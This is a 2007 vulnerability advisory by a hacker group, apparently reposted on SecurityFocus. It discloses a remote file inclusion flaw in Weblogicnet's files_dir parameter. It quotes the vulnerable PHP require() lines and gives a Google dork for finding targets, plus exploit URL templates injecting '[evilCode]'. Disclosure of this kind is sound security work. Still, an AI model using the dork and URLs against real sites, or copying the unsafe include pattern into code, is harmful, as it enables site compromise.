SolpotCrew Advisory #15 (home_edition2001) - Weblogicnet (files_dir) Remote File Inclusion Aug 31 2007 11:51PM
home_edition2001 irc mildnet org
#############################Nyubicrew Community################################
#
# Weblogicnet (files_dir) Remote File Inclusion
#
# vendor : http://www.weblogicnet.com/
# source : http://weblogicnet.com/data/weblogicnet.tgz
#
########################################################################
#########
#
#
# Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)
#
# contact: bius22 (at) mac (dot) com [email concealed]
#
# Website : www.solpotcrew.org/adv/home_edition2001-adv-02.txt
#
########################################################################
########
#
#
# Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM ,
# nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul
# wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz
# th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem
# x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]
# and all member #nyubicrew @ irc.mildnet.org
# especially thx to str0ke @ milw0rm.com
#
########################################################################
#######
Input passed to the "files_dir" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from :
es_desp.php
es_custom_menu.php
es_offer.php

########################################################################
########
# Weblogicnet #
# http://www.weblogicnet.com/ info (at) weblogicnet (dot) com [email concealed] #
########################################################################
########
# Use of this program constitutes your agreement to the terms contained in the #
# LICENSE file within this distribution. #
########################################################################
########

<ahref="
<?php require($files_dir.'/_custom_menu_link.php'); ?>">
<?php require($files_dir.'/_custom_menu_name.php'); ?></a><br>

google dork : inurl:es_offer.php?files_dir=

exploit : http://somehost/path_to_Weblogicnet/es_desp.php?files_dir=[evilCode]
http://somehost/path_to_Weblogicnet/es_custom_menu.php?files_dir=[evilCo
de]
http://somehost/path_to_Weblogicnet/es_offer.php?files_dir=[evilCode]

######################MY Special Girl JUST FOR U Ula#########################
######################################E.O.F#############################
#####

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus